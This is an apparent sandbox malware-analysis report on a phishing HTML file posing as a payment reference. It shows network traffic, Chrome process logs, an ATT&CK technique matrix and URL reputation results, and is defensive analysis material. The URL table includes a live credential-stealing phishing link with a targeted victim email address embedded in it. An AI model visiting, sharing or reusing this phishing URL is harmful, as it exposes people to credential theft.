    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63628
    Source: unknownNetwork traffic detected: HTTP traffic on port 63544 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64252 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64566 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63621
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63620
    Source: unknownNetwork traffic detected: HTTP traffic on port 63638 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63623
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63622
    Source: unknownNetwork traffic detected: HTTP traffic on port 63997 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63462 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63683 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63941 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63636
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63635
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63638
    Source: unknownNetwork traffic detected: HTTP traffic on port 63765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63637
    Source: unknownNetwork traffic detected: HTTP traffic on port 63417 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63639
    Source: unknownNetwork traffic detected: HTTP traffic on port 63380 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63630
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63632
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63631
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63634
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63633
    Source: unknownNetwork traffic detected: HTTP traffic on port 64439 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64473 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64427 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63835 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64460
    Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64462
    Source: unknownNetwork traffic detected: HTTP traffic on port 63457 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64461
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64485 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64382 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64141 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64453
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64452
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64455
    Source: unknownNetwork traffic detected: HTTP traffic on port 63617 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64454
    Source: unknownNetwork traffic detected: HTTP traffic on port 64084 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64457
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64456
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64459
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64458
    Source: unknownNetwork traffic detected: HTTP traffic on port 64256 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64471
    Source: unknownNetwork traffic detected: HTTP traffic on port 64531 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64394 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64470
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64473
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64472
    Source: unknownNetwork traffic detected: HTTP traffic on port 64313 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63985 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64003 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64464
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64463
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64466
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64465
    Source: unknownNetwork traffic detected: HTTP traffic on port 64232 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64468
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64467
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64469
    Source: unknownNetwork traffic detected: HTTP traffic on port 60214 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64480
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64482
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64481
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64000
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64484
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64483
    Source: unknownNetwork traffic detected: HTTP traffic on port 64072 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64370 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64599 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63548 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64268 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64543 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63605 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64475
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64474
    Source: unknownNetwork traffic detected: HTTP traffic on port 64027 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64477
    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64476
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64479
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64478
    Source: unknownNetwork traffic detected: HTTP traffic on port 63789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64325 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64600 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64491
    Source: unknownNetwork traffic detected: HTTP traffic on port 63433 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64490
    Source: unknownNetwork traffic detected: HTTP traffic on port 64497 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64493
    Source: unknownNetwork traffic detected: HTTP traffic on port 64506 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64492
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64011
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64495
    Source: unknownNetwork traffic detected: HTTP traffic on port 63733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64010
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64494
    Source: unknownNetwork traffic detected: HTTP traffic on port 64220 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64009
    Source: unknownNetwork traffic detected: HTTP traffic on port 63469 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64002
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64486
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64001
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64485
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64004
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64488
    Source: unknownNetwork traffic detected: HTTP traffic on port 63698 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63973 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64003
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64487
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64006
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64005
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64489
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64008
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64007
    Source: unknownNetwork traffic detected: HTTP traffic on port 64177 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63883 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63571
    Source: unknownNetwork traffic detected: HTTP traffic on port 63482 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63570
    Source: unknownNetwork traffic detected: HTTP traffic on port 64337 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64612 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63642 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63948 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64039 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64417
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63569
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64416
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64419
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64418
    Source: unknownNetwork traffic detected: HTTP traffic on port 63745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63562
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63561
    Source: unknownNetwork traffic detected: HTTP traffic on port 63376 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63564
    Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49716 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49717 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49725 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.3.187.198:443 -> 192.168.2.5:63391 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:63424 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.5:63475 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.5:63578 version: TLS 1.2

    System Summary

    barindex
    Source: Name includes: Payment Ref_13768_448375.htmlInitial sample: payment
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6200_1272423254Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6200_1272423254\sets.jsonJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6200_1272423254\manifest.jsonJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6200_1272423254\LICENSEJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6200_1272423254\_metadata\Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6200_1272423254\_metadata\verified_contents.jsonJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6200_1272423254\manifest.fingerprintJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\chrome_BITS_6200_106545729Jump to behavior
    Source: classification engineClassification label: mal72.phis.winHTML@41/1568@128/74
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Payment Ref_13768_448375.html"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2008,i,3179526055083523585,4364293001320133249,262144 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3268 --field-trial-handle=2008,i,3179526055083523585,4364293001320133249,262144 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2008,i,3179526055083523585,4364293001320133249,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3268 --field-trial-handle=2008,i,3179526055083523585,4364293001320133249,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Binary string: c.pdb_observe(g)}function d(){c&&g&&(c.pdb_unobserve(g),g=null)}var e=k,c=null,g=null,n=m.init(l);this.setAsin=function(e,l){l=l||{};d();c=f.get(e);a(c,l);c.loading&&b(function(b){a(b,l)});return c};this.clear=function(){d();c={};m.update(n,c)}}});g.P&&n.when("jQuery","afterLoad").register("gw-resource-logger",function(f){return{instrumentResources:function(m){var k;k=!1;if(f.isArray(m)&&!f.isEmptyObject(m)){k=!0;for(var h=0;h<m.length;h++){var l=m[h];if("id"in l&&"regex"in l&&"initiator"in l){if(!("string"=== source: chromecache_692.2.dr, chromecache_1088.2.dr
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
    Source: chromecache_1207.2.drBinary or memory string: <a data-routing="" class="a-link-normal s-navigation-item" tabindex="-1" href="/s?k=toys&amp;rh=n%3A11497802031%2Cp_6%3AA2QUTRSO1ZHRN9&amp;dc&amp;_encoding=UTF8&amp;content-id=amzn1.sym.0e2c3eeb-0b89-4f8d-9470-ba5240f72926&amp;crid=33DY8CRTKE0JW&amp;pd_rd_r=eb837932-48d0-4d35-b743-a6bf62f5a886&amp;pd_rd_w=vdKJ7&amp;pd_rd_wg=vThym&amp;pf_rd_p=0e2c3eeb-0b89-4f8d-9470-ba5240f72926&amp;pf_rd_r=APAVCQJMFK78QJEV1PMZ&amp;qid=1724264932&amp;rnid=12407979031&amp;sprefix=toy%2Caps%2C204&amp;ref=sr_nr_p_6_1&amp;ds=v1%3AnI3gixtx4SqeMukzS8BQRPNbnLC4%2FC6WW9Przy27Z2E">
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Scripting
    1
    Process Injection
    11
    Masquerading
    OS Credential Dumping1
    Security Software Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder
    1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Deobfuscate/Decode Files or Information
    Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    File Deletion
    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://7czh8.crimiti.com/3aqy/#O#Kcontact@johnsonsorthopedic.com100%SlashNextCredential Stealing type: Phishing & Social Engineering
    https://johndeere.com0%URL Reputationsafe
    https://cafemedia.com0%URL Reputationsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/coop/nordicdots_spartan_banner.j0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/I/21RZgaOpsqL._RC%7C01jGK8CGXTL.css,01LNhrqAZmL.css,11mqgJVSK9L.css,01+6LDwsu8L.css,01ixfc-7StL.css,11ahlU8GWXL.css,01+neHskhqL.css,01U2pA95KSL.css,01fn6WRzO6L.css,01Sqn3dOuBL.css,01KrVAe0PrL.css,31wUat9O8SL.css,31gMGQBDl3L.css,01mP5ZKi0aL.css,01mEWw4285L.css,31FHXBkYr7L.css,11VKiAMd89L.css,21K0oo63ZeL.css,11E6-iRIJOL.css,01K0fSFz6eL.css,014eilLW+IL.css,01MU0Cb7yFL.css,01jaS0ue2bL.css,01Gjv7o0taL.css,019L5P4oPhL.css_.css?AUIClients/SearchPartnerAssets0%Avira URL Cloudsafe
    https://images-na.ssl-images-amazon.com/images/G/01/x-locale/common/grey-pixel.gif0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213331_UAE_3151168_153x125_en_AE._SY116_CB428587699_.jpg0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Smartwatch_1x._SY116_CB659040198_.jpg0%Avira URL Cloudsafe
    https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:SX0TR1HXR3TVBG1JQK3B$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295396.0%26id%3DSX0TR1HXR3TVBG1JQK3B%26sc0%3Daui%3Asw%3Appft%3Acallback_ricb%26bb0%3D55%26pc0%3D230%26ld0%3D230%26t0%3D1724264967070%26sc1%3Dportal-bb%26pc1%3D16%26ld1%3D17%26t1%3D1724264966927%26sc2%3Daui%3Asw%3Apage_proxy%3Arequest_feature_tags%26bb2%3D230%26pc2%3D4237%26ld2%3D4237%26t2%3D1724264971077%26sc3%3Doctopus-search-result-card_apb-browse_0%26bb3%3D955%26be3%3D1232%26pc3%3D7173%26ld3%3D7173%26t3%3D1724264974013%26sc4%3DcsmCELLSframework%26bb4%3D1287%26pc4%3D1287%26ld4%3D1287%26t4%3D1724264968127%26sc5%3DcsmCELLSpdm%26bb5%3D1287%26pc5%3D1292%26ld5%3D1292%26t5%3D1724264968132%26sc6%3DcsmCELLSvpm%26bb6%3D1293%26pc6%3D1293%26ld6%3D1293%26t6%3D1724264968133%26sc7%3DcsmCELLSfem%26bb7%3D1293%26pc7%3D1293%26ld7%3D1293%26t7%3D1724264968133%26sc8%3Due_sushi_v1%26bb8%3D1294%26pc8%3D1295%26ld8%3D1295%26t8%3D1724264968135%26ctb%3D1:95630%Avira URL Cloudsafe
    https://aax-eu.amazon-adsystem.com/s/ecm3?ex=improvedigitalHMT&id=eab38052-3123-4242-b53f-8de88eb09882&gdpr_consent=0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/71U06Q9P9YL._AC_UL320_.jpg0%Avira URL Cloudsafe
    https://aax-eu.amazon-adsystem.com/s/ecm3?ex=indexHMT&id=ZsYx9dHM6rkAAEAZATd5iQAA0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/L2-Top-brands-Head-750%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/31EO3Wv+aeL._SR240,220_.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/51Ma-nfVD-L._AC_SY200_.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/81BY-cAOlCL._AC_QL10_SX160_SY600_FMwebp_.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/31OyASKbVLL.js0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Earphones_1x._SY116_CB659040113_.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/41daFqDf-bL._SR240,220_.jpg0%Avira URL Cloudsafe
    https://cm.g.doubleclick.net/pixel?google_nid=a9eu&google_cm=&ex=doubleclick.net&gdpr_consent=&google_tc=0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/L2-Smartwatches-Goqii0%Avira URL Cloudsafe
    https://desimartini.com0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/Associates/BTS24_AE_GW_ADIB_DC_758x608_EN._SY3040%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/91rNDaUuWZL.js0%Avira URL Cloudsafe
    https://unagi-na.amazon.com/1/events/com.amazon.csm.nexusclient.gamma0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/61BpJ-+2UGL._AC_SY200_.jpg0%Avira URL Cloudsafe
    https://cookie-matching.mediarithmics.com/input?key=GOO&key=GOO&action=GET_ID&opid=goo&etid=&domid=1106&ops=apx&google_gid=CAESELPyf_eKC0xl1BTvcv1gIuY&google_cver=10%Avira URL Cloudsafe
    https://m.media-amazon.com/images/G/01/share-icons/0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/11EIQ5IGqaL._RC0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/71oeOVwPQ-L._AC_UL320_.jpg0%Avira URL Cloudsafe
    https://www.amazon.ae/rd/uedata?rid=APAVCQJMFK78QJEV1PMZ&sid=261-8635865-4706955&rx=6Er0okjb5uYy04ZZ97hxbA0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/715CW0XxRBL._AC_UL320_.jpg0%Avira URL Cloudsafe
    https://data.amazon.ae/api/marketplaces/A2VIGQ35RCS4UG/cart/carts/retail/items?ref=sr_atc_rt_add_30&0%Avira URL Cloudsafe
